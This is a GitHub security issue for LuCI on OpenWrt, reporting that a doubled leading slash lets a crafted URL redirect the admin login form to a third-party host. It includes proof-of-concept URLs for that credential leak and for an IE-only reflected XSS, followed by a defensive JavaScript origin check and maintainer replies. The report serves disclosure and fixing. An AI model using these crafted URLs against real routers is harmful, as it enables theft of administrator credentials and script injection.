Possible to change form post URL for the login page - potential leak of admin credentials
By adding an extra / after the beginning of that path, the login form will be submitted to a third-party web site.
Example:
http://192.168.56.2//httpbin.org/anything/..%2f..%2f/cgi-bin/luci/
Resulting HTML: <form method="post" action="//httpbin.org/anything/..%2f..%2f/cgi-bin/luci/">
The URL is reflected in the response. An attacker can use this to trick an admin into submitting the username and password to an attacker-controlled website. Modern browsers will likely make this hard to exploit, especially since #1343 was introduced.
A possible solution should be to make sure the form action URL always starts with a leading . before the first /.
Side note:
Another attack (XSS) that only works in Internet Explorer.
http://192.168.56.2//192.168.56.2/..%2f/cgi-bin/luci/?iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii<script>alert(1)</script>
IE does not encode < and > in the query string (as opposed to FF/Chrome) and because the form is submitted from the same domain, the XSS filter in IE doesn’t block the XSS attack.
Verified on:
Powered by LuCI Master (git-18.088.49307-90ed423) / OpenWrt SNAPSHOT r6567-db893ec
Let me know if there is another preferred method of reporting security issues.
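Added example, not part of the original report and not LuCI code: it resolves the reflected action value from the report the way a browser does and checks which origin the login form would post to, before and after two normalisations. The function names are hypothetical, and the slash-collapsing variant is an assumption of this example rather than the fix LuCI adopted.

```javascript
// Values taken from the report above.
const PAGE = "http://192.168.56.2//httpbin.org/anything/..%2f..%2f/cgi-bin/luci/";
const REFLECTED_ACTION = "//httpbin.org/anything/..%2f..%2f/cgi-bin/luci/";

// Resolve a form's action attribute against the document URL (WHATWG URL
// parsing, as browsers do) and return the origin the form posts to.
function postOrigin(pageUrl, action) {
  return new URL(action, pageUrl).origin;
}

// True when submitting the form would send its fields to another origin.
function postsOffOrigin(pageUrl, action) {
  return postOrigin(pageUrl, action) !== new URL(pageUrl).origin;
}

// Option from the report: put a "." before the first "/" so the value is a
// relative path and can no longer be parsed as "//host/...". The path is then
// resolved relative to the current document, so only the origin is checked here.
function dotPrefix(action) {
  return action.startsWith("/") ? "." + action : action;
}

// Alternative (assumption of this example): collapse the leading run of
// slashes to a single one. Backslashes are included because the URL parser
// treats "\" like "/" in http(s) URLs.
function collapseLeadingSlashes(action) {
  return action.replace(/^[\/\\]+/, "/");
}

// Summarise where each variant of the action would send the credentials.
function report() {
  return {
    reflected: postOrigin(PAGE, REFLECTED_ACTION),
    dotPrefixed: postOrigin(PAGE, dotPrefix(REFLECTED_ACTION)),
    collapsed: postOrigin(PAGE, collapseLeadingSlashes(REFLECTED_ACTION)),
  };
}

console.log(report());
```

The same `postsOffOrigin` check can be used in a regression test that requests the login page under a path with a doubled leading slash and fails if the rendered action leaves the router's origin.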
Top GitHub Comments
Then this XSS issue is unrelated to LuCI and needs to be fixed in uhttpd instead.
Seems to be working now. I’m closing.